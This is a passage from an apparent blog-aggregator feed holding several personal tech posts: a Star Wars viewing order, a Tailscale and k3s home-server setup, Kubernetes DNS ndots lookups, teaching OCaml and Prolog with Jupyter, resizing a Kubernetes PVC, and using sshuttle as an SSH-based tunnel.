experience the power vaccuum in the galaxy, which hopefully makes sense before jumping into The Force Awakens and rise of the First Order.\n  Why jump to Episode VII (The Force Awakens) instead of finishing The Mandalorian?\n  We jump a bit ahead (before finishing The Mandalorian) to “A Force Awakens”, getting to just the start of Rey’s story. This is the only “chronology break” in the order, but has no side-effects4. The reason for the jump (as opposed to finishing The Mandalorian first) is to have a switch in pace. While I love The Mandalorian, I think pacing it out makes it better.\n  Why keep Episode VII (The Force Awakens) but not the other sequels?\n  The best and the worst thing about The Force Awakens is that it is very much “Star Wars”. It doesn’t take any risks, sticks to the tropes, and more importantly - it closes mostly as a self-contained film. Yes, there are a few plot-hooks (Rey’s parentage, Luke, Finn’s coma), but given how badly they are resolved in the following films - it seems Disney didn’t have any better idea to the answers than the viewers. It also gives you a “tasting experience” of the sequels. The sequels have always been polarizing, and watching it gives you a better heading to make the choice b\u002Fw Prequels\u002FSequels later on in the order.\n\n\nWe close with The Mandalorian finale. The Mandalorian isn’t, strictly speaking, essential viewing. While there are hooks, it doesn’t really change anything of consequence to the main saga (at least not in Season 1). But frankly, it is so well made - you deserve to enjoy it. Just look at the trailer:\n\n\nIf you have feedback, send me a tweet. If you’re reading this in the future, note that this was written in May 2020 and could not include media yet to be published.\nHappy Star Wars Day! ↩\nBeskar is the Star Wars universe’s Vibranium, and features majorly in The Mandalorian as a minor plot device. ↩\nThe arguments against starting with Rogue One don’t even apply to rewatches, so we ignore the Machete Guideline to keep it to the end. ↩\nIn other words, watching The Force Awakens can’t alter the experience of watching the last few episodes of The Mandalorian season 1. ↩",[],{"slug":2230,"title":2231,"link":2232,"pubDate":2233,"contentSnippet":2234,"tags":2235,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"home-server-updates","Using Tailscale for home server","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhome-server-updates\u002F","2020-04-23T02:40:55.000Z","For those of you who are new to my blog, I had written about my home server setup (hydra) a few months back. Since then I’ve tweaked the setup a bit and made some changes to how I organise\u002Fdeploy applications inside my cluster. I’ll be talking about the updates made so far and the reason behind them.\nA brief overview of what has changed from hydra v0.1 to hydra v0.2:\nReplaced Wireguard with Tailscale\nAdded a new worker node (residing in DigitalOcean, Bengaluru) to the existing RPi k3s cluster.\nShifted from PiHole to Adguard DNS upstreaming to Unbound.\nContainerised all workloads and deployed on K8s (using k3s platform).\nThe setup looks something like this now:\n\nLet’s take a quick look at some of the above things in detail!\nUsing Tailscale#\nSo, before we jump to why I started using Tailscale, let’s address a few things about Wireguard which bothered me.\nAdding new devices is a real PITA and quite often laziness kicks in to generate a QR code or Private\u002FPublic key pair. So, for those of you unaware, Wireguard needs a client config to add the server endpoint and it’s public key for the client to communicate with the server. You need to add the client’s private key on the server-side as well for the exchange of encrypted packets to happen. Doing all of this manually has been one of the reasons I’ve not added\u002Fupdated my devices as regularly as I’d like to do. For eg, on my recently bought iPad, I just haven’t bothered to do all of this, cause ugh I am lazy?\nHaving a central VPN server to talk to my RPi from my local network just doesn’t seem right you know? Especially when both devices are literally lying in the same room, sending the packets to a server somewhere in Electronic City (DO, blr region) from JP Nagar (where I live) feels like totally unnecessary. I really needed a mesh network to reduce wasted bandwidth and latencies. Having a central VPN server is also a SPOF, not that my home-server runs any mission-critical workloads, but still good to avoid where we can. Where else can I flex my ops-chops skills if not my home server, eh?\nI started looking at different mesh VPN setups and Tailscale attracted me the most. I heard about Tailscale first time when I saw bradfitz’s post about leaving Google and joining Tailscale on HN. Interestingly, Tailscale is built on top of wireguard-go (the userspace implementation of Wireguard kernel module). Since I was already familiar with Wireguard and had been using it for almost a year, I got curious on Tailscale.\nTailscale basically sets up a point-to-point encrypted network across all your devices. What that means is there’s no “relay” (like Wireguard server) and clients can talk to each other directly. While it may seem that it is easy to set this up with a bunch of shell scripting-foo (just add all Wireguard peers in each peer config), Tailscale attempts to do a lot of the heavy lifting by making the network seamless and handling authentication.\nCoordination Server#\nSo, when we add a new device to Wireguard server, we basically need to generate a private\u002Fpublic key pair as explained above. When you’re setting up Tailscale agent, it does all of this in the background and asks you to authorise to a central co-ordination server. Now, this server is only used to exchange information about each peer in your network. The tailscale agent uploads the private\u002Fpublic key information of the peer you are currently on and any time any new peer joins the network, all of the agents’ configurations are updated real-time. The coordination server periodically checks for any new changes and pushes the updates to the agent on each node.\nThe real juice is that they authenticate via OAuth, OIDC or SAML. Which means that you can use your existing 2FA configurations to authenticate a new node in the network. However, this might be a point of concern for some users, but I chose convenience here. Also, since the traffic flows through the nodes directly, and is encrypted there’s not much to worry here. I’ve been following Tailscale closely and they do plan to opensource the co-ordination server in future, so maybe when that happens I’ll self-host it.\nNAT Traversal#\nApart from handling the auth, Tailscale does a pretty good job at handling connectivity across different network topologies. So, basically, if you want to peer 2 devices over the public internet you’d need to perform NAT Traversal. There are several NAT hole punching techniques which allow traversing NAT but since they are not standardised and sometimes due to erratic NAT behaviour, it poses quite a challenge to do it seamlessly. And, I’m not even talking about roaming networks as of yet.\nTailscale agents can perform NAT traversal using ICE and STUN. What all of this practically means is if you’re sitting in a cafe somewhere and you want to access any of your internal service it is possible without messing around any firewall ports :D\nTL;DR: I decided to give Tailscale a shot and was quite impressed by how easy it was to setup. You can refer to the official docs for more instructions but I was able to set it up across 2 RPis and have them talk to each other under 15 minutes. I think that’s quite an awesome feat in itself. The only sad bit is they don’t have an Android app yet, so I am eagerly waiting for it.\nHybrid K3s Cluster#\nSo, I am running a k3s cluster on my RPi. At that time I was still using DO for running Pihole, Unbound, public DNSCrypt resolver etc. I decided to standardise the ad-hoc deployments to manage them efficiently. It also allowed me to play around with more on K8s which was my original goal behind buying these Pi was.\nNow, I’ve 2*RPi nodes, the k8s master node runs on the 4GB RPi while the 2GB variant serves as a worker node. I decided to get a bit fancy with my setup and hooked up the k3s agent installation script on a DO node andta-da! I have a multi-arch(amd64 and arm64), hybrid (bare metal and cloud) K8s cluster ready! I think if I sprinkle some ML\u002FAI + Bitcoins in the above setup, I’m all set to raise VC funding for hydra.\nI wanted to learn Terraform as part of my work at my org as well, so I created + managed the entire droplet through terraform. The script has modules to provision a droplet, attach an elastic IP, configure firewall rules and add my SSH key to the server. Quite easy to manage and I am generally a hater of GUIs, so Terraform is indeed a blessing in disguise.\nI know some of my opinions are a bit strong but don’t worry I get meme’d\u002Fburnt for this almost every day by my work colleagues.\nPihole to Adguard#\nWhile Pihole works really well for blocking Ads it had some features lacking, particularly DOT and DOH support out of the box. I decided I’ll shift to Adguard as the codebase is in Go - something which I am a bit familiar with and also the UI feels a bit sleek and refreshing too!\n\nAccessing internal services#\nA major challenge for me was however to configure access to internal services on the K8s cluster. Since I have bare metal worker nodes, it’s not possible to deploy a cloud load balancer. For now, I went with a really simple old school solution, to expose an Nginx proxy front-ending all my services through NodePort. I am planning to look at Traefik or Istio for this but I wanted to just shipit! at this point.\nHere’s a very basic example of an nginx config for ip.mrkaran.dev that I run on my cluster:\nserver {\n        server_name ip.mrkaran.dev;\n        # reverse proxy\n        location \u002F {\n                proxy_pass http:\u002F\u002F100.96.239.6:30506; # tailscale IP, connecting to NodePort service\n                include fluff\u002Fproxy.conf;\n        }\n}\n30506 port is exposed by the Service object backing up the pods for that application. Since a NodePort service is available on any K8s node, you can give the Tailscale IP for any node and the routing will be handled by kube-proxy.\nChallenges faced#\nMesh or mess#\nSetting all of this up didn’t come without its own challenges or hurdles. Right off the bat, the first problem was that I was seeing really high latencies from my RPi node to DO node through Tailscale. Now, since both the nodes are physically in Bangalore and they are connecting to each other (or that’s what I had presumed), I didn’t expect latencies to be as high as 500-600ms. Bollocks!\nEventually, I’d figured thanks to my super restrictive rules on the firewall of DO node, I had blocked all inbound UDP connection. That means NAT hole punching through STUN is simply not possible. In such cases, Tailscale forwards all packets to an encrypted TURN server(called DERP - Designated Encrypted Relay for Packets), which basically are TCP encrypted relays. Tailscale manages this network of DERPs and the one I got connected to was somewhere in the USA.\nBottom line, I was all pumped up to talk to a DO node from my RPi node but as it turns out (no pun intended) my packets were flowing through the USA! Ah so bad. Anyway, opening up UDP from the Tailscale subnet, fixed the issue and latencies were back to being sub 10ms. Yay!\nOverlay over an overlay#\nNext up, were problems with K3s networking from the DO node to RPi node. The DO node was in a NotReady state because the agent couldn’t reach the server:\nApr 14 09:00:33 hydra-control k3s[19746]: I0414 09:00:33.306650   19746 log.go:172] http: TLS handshake error from 100.97.222.106:51516: read tcp 100.96.239.6:6443->100.97.222.106:51516: read: connection reset by peer\nThrough some trial and error and reading the docs, I figured that flannel is running as a CNI in k3s. Now the problem is flannel itself is an overlay network. But… Tailscale already is an overlay network (Wireguard) so the packets are not being routed correctly and being dropped halfway in the master node (I am guessing the DNAT\u002FSNAT translation botched up here).\nThe trick was to just change flannel backend to run in the host namespace only. That solved the above issue for me.\nHowever, I still had one more issue. The DO node’s public IP was being advertised, while the agent was running on Tailscale network interface so the master was never able to reach the agent. Similarly, when the agent tried to communicate with the server, the private IP of the node was being advertised.\nSetting the --node-external-ip \u003Ctailscale-ip> in k3s config seemed to have fixed the problem.\nNow all of the nodes in the cluster had proper Tailscale IPs advertised and the node went to Ready state, at last!\nWho let the DNS out#\nSo, I’ve a chicken and egg problem in my setup. Since my laptop runs a Tailscale agent and whenever I boot up my systemm, Tailscale attempts to posts logs to log.tailsclae.io and fails to start if it cannot. The problem here is who resolves the DNS for me?\nI run a local DNS server with CoreDNS forwarding my queries to Adguard. Now if I can’t reach Adguard (since Tailscale agent hasn’t initialised), how am I supposed to resolve log.tailscale.io? I did what any sane guy would do, write a simple hacky bash script:\n#!\u002Fbin\u002Fbash\nsudo chattr -i \u002Fetc\u002Fresolv.conf\nsudo echo 'nameserver 1.1.1.1' > \u002Fetc\u002Fresolv.conf\necho \"changed dns server to 1.1.1.1\"\nsudo tailscale up\nsudo echo 'nameserver 127.0.0.1' > \u002Fetc\u002Fresolv.conf\necho \"changed dns server back to 127.0.0.1\"\nsudo chattr +i \u002Fetc\u002Fresolv.conf\nYes, it’s quite insane. Also, I’ve not been able to figure out how to stop NetworkManager from changing my \u002Fetc\u002Fresolv.conf so I rely on a hack (documented in Arch official docs), to lock the file so any process cannot modify it. Quirky, but works!\nStorage#\nUnfortunately, I don’t have any external HDD\u002FSSD so I am postponing running any stateful workloads till I get one soon (whenever lockdown gets over in my area). I plan to deploy an NFS server so I can run stateful workloads across any node and have redundancy in form of cloud backups. I’ve also heard cool things about Longhorn but unfortunately, it doesn’t have ARM support.\nFinal Thoughts#\nWell, I am quite stoked by my current setup right now. Learnt a bunch of cool things around NAT traversal, zero-trust networking, realised the old days of LAN were so much better (not that I am that old to have experienced, my first internet connection was rather broadband at home, not even dial-up). Tailscale opens up a lot of new opportunities for corporate VPNs and it is something definitely to watch out for as they continue improving the product.\nAlso, I was super elated when bradfitz himself had commented on my tweet, not gonna lie!\n{{\u003C tweet 1249552822674149376 >}}\nCredits#\nFirst, a major thanks to my friend sarat with whom I pair debugged a lot of the above issues and since he also runs a home server, he was my go-to person to ask doubts!\nHere are some links that I collected while setting all of this up and might be useful as references if you’re planning a similar setup!\nHow Tailscale Works\nWhat are these 100.x.y.z addresses?\nk3s config reference\nP2P across NAT\nRemembering the LAN\nCloudskew (wonderful tool for creating architecture diagrams)\nIf you’ve any questions please find me on Twitter @mrkaran. You can find all of the setup on GitHub.\nTill next time, if we survive the pandemic!",[],{"slug":2237,"title":2238,"link":2239,"pubDate":2240,"contentSnippet":2241,"tags":2242,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"change-font-in-telegram-desktop","How to change font in telegram desktop in Linux and Windows","https:\u002F\u002Fibcomputing.com\u002Fchange-font-in-telegram-desktop\u002F","Tue, 10 Mar 2020 08:59:38 +0000","Telegram Desktop is a wonderful application to access Telegram in computer. This applications is available for Gnulinux, Windows and Mac. But the main problem of … \nThe post How to change font in telegram desktop in Linux and Windows appeared first on IB Computing.",[2199,2200,12,2243],"Windows",{"slug":2245,"title":2246,"link":2247,"pubDate":2248,"contentSnippet":2249,"tags":2250,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"build-presentations-with-reveal-js-and-markdown","Create A Simple Presentation using Reveal js and Markdown","https:\u002F\u002Fibcomputing.com\u002Fbuild-presentations-with-reveal-js-and-markdown\u002F","Sat, 22 Feb 2020 06:13:44 +0000","Presentations are important to share something to others. we have Office software such as Libre office impress, Microsoft Office PowerPoint, google Slides to do this … \nThe post Create A Simple Presentation using Reveal js and Markdown appeared first on IB Computing.",[2200,2251,2252,2253,2254],"Javascript","Markdown","Presentation","revealjs",{"slug":2256,"title":2257,"link":2258,"pubDate":2259,"contentSnippet":2260,"tags":2261,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"ndots-kubernetes","DNS Lookups in Kubernetes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fndots-kubernetes\u002F","2020-02-02T05:27:55.000Z","One of the primary advantages of deploying workloads in Kubernetes is seamless application discovery. Intra cluster communication becomes easy with the concept of Service which represents a Virtual IP backing a set of Pod IPs. For example, if vanilla service needs to talk to a chocolate service, it can directly use the Virtual IP for chocolate. Now the question is who resolves the DNS query for chocolate and how?\nDNS resolution is configured in Kubernetes cluster through CoreDNS. The kubelet configures each Pod’s \u002Fetc\u002Fresolv.conf to use the coredns pod as the nameserver. You can see the contents of \u002Fetc\u002Fresolv.conf inside any pod, they’ll look something like:\nsearch hello.svc.cluster.local svc.cluster.local cluster.local\nnameserver 10.152.183.10\noptions ndots:5\nThis config is used by DNS clients to forward the DNS queries to a DNS server. resolv.conf is the resolver configuration file which has information about:\nnameserver : Where the DNS queries are forwarded to. In our case this is the address of CoreDNS service.\nsearch: Represents the search path for a particular domain. Interestingly google.com or mrkaran.dev is not FQDN (fully qualified domain name). A standard convention that most DNS resolvers follow is that if a domain ends with . (representing the root zone), the domain is considered to be FQDN. Some resolvers try to act smart and append the . themselves. So mrkaran.dev. is an FQDN but mrkaran.dev is not.\nndots: This is the most interesting value and is the highlight of this post. ndots represents the threshold value of the number of dots in a query name to consider it as a “fully qualified” domain name. More on this later, as we discover the flow of DNS lookup.\n\nLet’s check what happens when we query for mrkaran.dev in a pod.\n$ nslookup mrkaran.dev\nServer: 10.152.183.10\nAddress: 10.152.183.10#53\n\nNon-authoritative answer:\nName: mrkaran.dev\nAddress: 157.230.35.153\nName: mrkaran.dev\nAddress: 2400:6180:0:d1::519:6001\nFor this experiment, I’ve also turned on CoreDNS logging level to all which makes it highly verbose. Let’s look at the logs of coredns pod:\n[INFO] 10.1.28.1:35998 - 11131 \"A IN mrkaran.dev.hello.svc.cluster.local. udp 53 false 512\" NXDOMAIN qr,aa,rd 146 0.000263728s\n[INFO] 10.1.28.1:34040 - 36853 \"A IN mrkaran.dev.svc.cluster.local. udp 47 false 512\" NXDOMAIN qr,aa,rd 140 0.000214201s\n[INFO] 10.1.28.1:33468 - 29482 \"A IN mrkaran.dev.cluster.local. udp 43 false 512\" NXDOMAIN qr,aa,rd 136 0.000156107s\n[INFO] 10.1.28.1:58471 - 45814 \"A IN mrkaran.dev. udp 29 false 512\" NOERROR qr,rd,ra 56 0.110263459s\n[INFO] 10.1.28.1:54800 - 2463 \"AAAA IN mrkaran.dev. udp 29 false 512\" NOERROR qr,rd,ra 68 0.145091744s\nWhew. So 2 things piqued my interest here:\nThe query iterates through all search paths until the answer contains a NOERROR code (which the DNS clients understand and store it as the result). NXDOMAIN simply indicates no record found for that domain name. Since mrkaran.dev isn’t an FQDN (according to ndots=5 setting), the resolver looks at search path and determines the order of query.\nA and AAAA records are fired parallelly. This is because single-request option in \u002Fetc\u002Fresolv.conf has a default configuration to perform parallel IPv4 and IPv6 lookups. You can disable this using single-request option.\nNote: glibc can be configured to send these requests sequentially but musl cannot, so Alpine users must take note.\nPlaying around with ndots#\nLet’s play around with ndots a bit more and see how it behaves. The idea is simple, for the DNS client to know whether a domain is an absolute one or not is through this ndots setting. For example, if you query for google simply, how will the DNS client know if this is an absolute domain. If you set ndots as 1, the DNS client will say “oh, google doesn’t have even one 1 dot, let me try going through search list. However, if you query for google.com, the search list will be completely ignored since the query name satisfies the ndots threshold (At least one dot).\nWe can see this by actually doing it:\n$ cat \u002Fetc\u002Fresolv.conf\noptions ndots:1\n$ nslookup mrkaran\nServer: 10.152.183.10\nAddress: 10.152.183.10#53\n\n** server can't find mrkaran: NXDOMAIN\nCoreDNS logs:\n[INFO] 10.1.28.1:52495 - 2606 \"A IN mrkaran.hello.svc.cluster.local. udp 49 false 512\" NXDOMAIN qr,aa,rd 142 0.000524939s\n[INFO] 10.1.28.1:59287 - 57522 \"A IN mrkaran.svc.cluster.local. udp 43 false 512\" NXDOMAIN qr,aa,rd 136 0.000368277s\n[INFO] 10.1.28.1:53086 - 4863 \"A IN mrkaran.cluster.local. udp 39 false 512\" NXDOMAIN qr,aa,rd 132 0.000355344s\n[INFO] 10.1.28.1:56863 - 41678 \"A IN mrkaran. udp 25 false 512\" NXDOMAIN qr,rd,ra 100 0.034629206s\nSince mrkaran didn’t specify any . so the search list was used to find the answer.\nNote: ndots value is silently capped to 15 and is 5 in Kubernetes as default.\nHandling this in Production#\nIf your application is of the nature that makes a lot of external network calls, the DNS can become a bottleneck in case of heavy traffic since a lot of extra queries are made before the real DNS query is even fired. It’s quite uncommon to see applications appending the root zone in the domain names, but that can be considered as a hack. So instead of using api.twitter.com, you can hardcode your application to include api.twitter.com. which would force the DNS clients to do an authoritative lookup directly on the absolute domain.\nAlternatively, since K8s 1.14, the dnsConfig and dnsPolicy feature gates have become stable. So while deploying a pod you can specify ndots setting to something lesser, say 3 or if you want to be really aggressive you can turn it down to 1. The consequences of this will be that every intra-node communication now has to include the full domain. This is one of the classic tradeoffs where you have to choose between performance and portability. If the app doesn’t demand super low latencies, I guess you need not worry about this at all since DNS results are cached internally too.\nReferences#\nI got to know about this peculiarity first, in a K8s meetup which I went to, last weekend where the folks mentioned about having to deal with this.\nHere are some additional links you can read on the web:\nExplainer on why ndots=5 in kubernetes\nGreat read on how ndots affects application performance\nmusl and glibc resolver inconsistencies\nNote: I’m particularly not using dig in this post. dig apparently automatically adds a . (root zone identifier) to make the domain an FQDN one without even first going through the search path. I’ve mentioned about this briefly in one of my older posts. Nonetheless, it’s quite surprising to see that you need to give a flag to make it behave in what seems to be a standard way.\nIt’s always DNS, isn’t it ;)#\nFin!\nUpdate#\n2020-12-24:\nIn case you want to play around with ndots and DNS more, I’ve worked on a DNS Client which lets you tweak these params on the fly. Feel free to checkout doggo if interested!",[],{"slug":2263,"title":2264,"link":2265,"pubDate":2266,"contentSnippet":2267,"tags":2268,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"ocaml-prolog-jupyter","Teaching OCaml and Prolog through Jupyter Notebooks","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fprolog\u002Fjupyter\u002Fnotebooks\u002F2020\u002F01\u002F19\u002FOCaml-Prolog-Jupyter\u002F","2020-01-19T15:16:00.000Z","Last semester at IIT Madras, I taught a revamped core course CS3100 Paradigms\nof Programming, which introduces 3rd-year\nstudents to functional and logic programming paradigms. While the course had\nbeen traditionally offered in Lisp and Prolog, I introduced OCaml instead of\nLisp. All of the lectures were delivered through interactive Jupyter\nnotebooks. The assignments were also distributed as Jupyter notebooks and\nevaluated through autograder facility in Jupyter. There has since been several\nrequests to replicate this setup elsewhere. Hence, I thought I should write\nabout the set up and experience of teaching through Jupyter notebooks.\nCourse Content\nHaving never taken a functional programming course, there was the question of\nwhat I wanted the students to take away from the course. I wanted the course to\nbe a mixture of functional programming concepts (types and lambda calculus) as\nwell as advanced yet pragmatic concepts that one would find in modern functional\nprogramming languages (such as GADTs and Monads). The OCaml part of the course\nis based on the excellent CS3110 from\nCornell and AFP from\nCambridge Computer Laboratory. In\nparticular, I would highly recommend the CS3110\nbook\nfor anyone taking first steps into functional programming. Lambda calculus\nlectures were based on Peter Selinger’s lecture notes on lambda\ncalculus.\nThe Prolog part of the course were modelled on Prolog lectures from Cambridge\nComputer Laboratory and the\nwonderful The Art of\nProlog book.\nTeaching functional and logic programming in the same course allowed me to\ndevelop interesting content that intersected both of the paradigms. In the\nfunctional programming part of the lecture, I had introduced simply typed\nlambda calculus. In the\nlogic part of the course, we developed a type checker for simply typed lambda\ncalculus in Prolog. Merely encoding type checking rules for simply typed lambda\ncalculus in Prolog, type inference with polymorphic types falls\nout. With a tiny bit of\ncoaxing, Prolog synthesizes programs for the given type. In the last assignment,\nthe students were asked to implement a Prolog interpreter in\nOCaml.\nThere was indeed some value in teaching multiple paradigms in the same course,\nnot just for a comparative study of strengths and weaknesses, but to be able to\nteach the students to pick the right tool for the job.\nCourse Delivery\nI had a clear idea that the course will have to be interactive where programs\nare developed during the lectures. There was the option of using pdf slides and\nswitching to utop for interactive\ndevelopment. But this solution lacked the uniformity that the students would\nlike when reviewing the course materials. Moreover, switching between two\nmediums made it difficult for me to plan the lectures and was a distraction for\nthe students.\nJupyter Notebooks\nHence, I decided to use Jupyter Notebooks for the course. Jupyter is a\ncollection of open source standards and software for interactive development.\nJupyter supports a variety of languages. For OCaml, I used\nakabe\u002Focaml-jupyter, an OCaml kernel\nfor Jupyter notebooks. This uses utop, an advanced OCaml top-level in the\nbackend and hence provides excellent interactive top-level support. The\nsituation for Prolog was not so great. Eventually, I zeroed in on\ntargodan\u002Fjupyter-swi-prolog\nbut ended up improving the solution a bit\nkayceesrk\u002Fjupyter-swi-prolog\n(TODO KC: upstream fixes). Jupyter supports mathjax,\nwhich allows typesetting LaTeX in the notebooks. This was great for writing the\nlectures on lambda calculus.\nRISE for slideshow\nJupyter notebooks are webpages that mixes text and code. For lectures, I much\nprefer slides since they let you focus on a particular images, statement or an\ninference rule. While Jupyter allows the conversion of notebooks to slides\nout-of-band, RISE is an Jupyter\nnotebook extension that lets turn your Jupyter notebook into a slideshow. Adding\nRISE to the setup makes the Jupyter experience compatible with traditional\nslides based lectures.\nCourse Distribution\nApart from delivering the lectures through the notebooks, I also wanted the\nstudents to be able to go through the notebooks and be able to run the snippets.\nInstalling all the required software (OPAM, OCaml, Prolog, Jupyter and its\nextensions, Jupyter Kernels for OCaml and Prolog) and correctly was not\nsomething I wanted the students to go through. I wasn’t even sure if this\nsoftware combination works on various Mac, Windows and Linux distributions.\nHence, everything was packaged as a Docker\nfile,\nand the latest version of the image uploaded to docker\nhub. In order to review the\ncourse, the students only had to install Docker and Git and run exactly 4\ncommands.\nDocker is generally supported on all major OSes. Packaging up the course content\nas a docker image and pushing it to dockerhub is insurance against the software\ncombination not working in the next offering of the course; if for some reason\none of the dependency does not work next year, I can always fallback to the\ndocker image while I find a fix. One of my TAs ran a tutorial on basic Docker\nand Git in the first week of the course to ensure that everyone was setup. I\nwould consider Docker and Git as essential tools for modern software development\nas well as research. After that, the students did not ever have to do anything\non the command line.\nAssignments\nnbgrader is a tool that\nfacilitates creating and grading assignments in Jupyter notebook. It uses\nlanguage-agnostic logic to identify failing cells, which meant that it was easy\nto set up nbgrader for OCaml and Prolog. The assignments were\nreleased as Jupyter notebooks,\nwhich the students filled in and submitted. nbgrader has support for unit tests\nwhich allowed the students to get instant feedback as they were developing the\nsolutions.\nWish List\nOverall, the students felt that the Jupyter notebooks were better than\nslidedecks. However, not everything was perfect with the Jupyter notebook based\nlecturing. Here are some of the things that could be improved.\nThere is no good diagramming + animation support for Jupyter notebooks. The\nbest I could find was egal whose user\ninterface I did not find intuitive. Even for simple diagrams, it was much more\neffort making diagrams there compared to Keynote, PowerPoint or OmniGraffle.\nEventually, I used draw.io to make the diagrams and\ninclude the images in the slides for a few of the cases where I actually\nneeded to make diagrams.\nDocker for Windows does not work on Windows Home or Student. Support for OPAM\non Windows is slowly improving, but it is not yet for novices. Hence, I had to\nrecommend the students to run an Ubuntu VM on their Windows machines in which\nthey ran the course’s docker container.\nnbgrader had several bugs which caused the autograder to award marks even for\nfailing cells. The TAs had to go through a few of the assignments manually to\nensure that students were awarded grades correctly. This is something that\nshould be fixable easily.\nRISE doesn’t easily let you change the size of the font. One has to edit the\nCSS to change the font size. And the default style wastes too much space. This\nmeant that not much content can be fit into a single slide. Hence, I’ve had to\nartificially split content into multiple slides or zoom out several steps to\nshow content that was cut off on the bottom.\nThe support for Prolog is not so great. There are a few advanced features in\nProlog for which the Prolog setup\nfails. I had to switch to\nSWI-Prolog top-level for a few lectures. That said, the Prolog support is\nmostly there and the issues can be fixed with some effort.\nConclusion\nI have started working on fixing some of these issues and upstreaming the\nsolutions. Hopefully the fixes should be ready for the next iteration of the\ncourse. If you would like to replicate this setup for your course, do feel free\nto utilise the course materials.",[],{"slug":2270,"title":2271,"link":2272,"pubDate":2273,"contentSnippet":2274,"tags":2275,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"resize-pvc-k8s","Resize PVC in Kubernetes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fresize-pvc-k8s\u002F","2020-01-14T02:40:55.000Z","Well, the title is self explanatory so let’s begin!\nFirst off, we need to ensure that the StorageClass which was used to provision the PVC has the correct configuration. From the official docs:\nYou can only expand a PVC if its storage class’s allowVolumeExpansion field is set to true.\nSo, let’s inspect our storage class:\n$ kubectl get sc # sc is short for storageclass\nNAME            PROVISIONER             AGE\ngp2 (default)   kubernetes.io\u002Faws-ebs   8d\n\n$ kubectl describe sc\u002Fgp2\n# output redacted to focus only on the field we're concerned with\nName:            gp2\nAllowVolumeExpansion:  True\nIf AllowVolumeExpansion is set to True you can skip the below step. If it’s not true, you need edit the field allowVolumeExpansion as true:\napiVersion: storage.k8s.io\u002Fv1\nkind: StorageClass\nmetadata:\n  annotations:\n    storageclass.kubernetes.io\u002Fis-default-class: \"true\"\n  name: gp2\nparameters:\n  fsType: ext4\n  type: gp2\nprovisioner: kubernetes.io\u002Faws-ebs\nreclaimPolicy: Delete\nvolumeBindingMode: WaitForFirstConsumer\nallowVolumeExpansion: true\nOnce the StorageClass config is correct, all we need to do is update with the new size.\nSo, for example if size of the PVC was 15GB orginally:\nspec:\n  resources:\n    requests:\n      storage: 15Gi\nTo update it to 30GB, you simply need to edit spec.resources.requests field:\nspec:\n  resources:\n    requests:\n      storage: 30Gi\nWe now need to “apply” the updated PVC manifest.\n$ kubectl apply -f pvc.yml\nLet’s take a look at the PVC:\n$ kubectl describe pvc\u002Fmyclaim\n# output redacted for brevity\n...\nConditions:\n  Type                      Status  LastProbeTime                     LastTransitionTime                Reason  Message\n  ----                      ------  -----------------                 ------------------                ------  -------\n  FileSystemResizePending   True    Mon, 01 Jan 0001 00:00:00 +0000   Tue, 14 Jan 2020 20:52:21 +0530           Waiting for user to (re-)start a pod to finish file system resize of volume on node.\n...\nSo, basically what FileSystemResizePending means is that while PVC is in use, we have to either restart or delete the underlying Pod using the PVC. At the time of writing this, ExpandInUsePersistentVolumes is still in beta and has to be enabled as a feature gate. Sadly, EKS is still on 1.14 (while the world has moved to 1.17, such sloooow release cycles!), so I couldn’t enable this in my case.\nOnce the pod is restarted, the expanded disk is automagically available! Let’s verify this:\nkc get pvc\u002Fmyclaim -o=jsonpath=\"{.status.capacity.storage}\"\n30Gi\nNow, compare this with the standard way of resizing an EBS volume in EC2 instance. You need to first modify the volume size using AWS EBS API and then in the EC2 instance, use a combination of growpart and resize2fs to extend the resized volume. This sounds much more cumbersome than simply updating the storage field in PVC manifest!\nFin!",[],{"slug":2277,"title":2278,"link":2279,"pubDate":2280,"contentSnippet":2281,"tags":2282,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"using-sshuttle","sshuttle - A better ssh tunnel","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fusing-sshuttle\u002F","2020-01-12T04:27:55.000Z","The Motivation#\nSometime back I had to access a Kubernetes API server which was firewalled to a private VPC network. I didn’t want to setup a separate bastion instance just to access this cluster, cause TBH bastions are kinda redundant in K8s as every task can be performed through the client-server APIs using kubectl. So, all I needed was access to this API server from a trusted network in a secure way. Thanks to my friend @sarat, I got to know about sshuttle. sshuttle is quite unique in the sense that it’s not really a VPN but acts like one (for most practical purposes). sshuttle lets you access an internal network through a trusted node inside the VPC, without you having to deal with the mess of port forwarding or VPNs.\nThe basic idea is pretty simple, sshuttle starts a local python server in your host machine and creates iptables rules to route the destination packets of the specified CIDR blocks to this local server. At the server, the packets are multiplexed over an ssh session and sent to the server. The server disassembles the multiplexed packet and the routes them to upstream. So, basically this is a clever hack to avoid TCP over TCP (which again is a mess on unreliable networks). Multiplexed streams on ssh is just a single stateful TCP connection (as compared to VPN connections which are stateless). Now you must be wondering, how come the target server disassembles the packets. Yes, there needs to be some kind of sshuttle daemon running which does that for you. This is where sshuttle does some magic, it automagically deploys a python script on your target host to perform this task. So yes, for sshuttle to work, both the client and target need to have python  and iptables installed.\nUsage#\nsshuttle -r user@port x.x.x.x\nAll the packets routed to the CIDR block will now go through sshuttle daemon, since it configured iptables rules for them.\nAlso, sshuttle starts a local python server on your host machine. You can see it using netstat:\n$ sudo netstat -tunapl | grep python\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\u002FProgram name\ntcp        0      0 127.0.0.1:12300         0.0.0.0:*               LISTEN      27425\u002Fpython\nThere’s a python server listening on port 12300 in my host machine. To actually verify, this indeed is started by sshuttle, you can use pstree -p | less and search for sshuttle. Here you can see sshuttle did indeed start a python server and the PID (27425) matches with the one we saw in netstat command.\n    -zsh(13201)---sshuttle(27425)-+-ssh(27446)---ssh(27447)\n                                    `-sudo(27427)---python(27445)\nYou can even forward DNS queries with the --dns flag. This is super helpful if you have something like Route53 to host your DNS records on a private zone (for eg tld like .internal).\nBetter than SSH 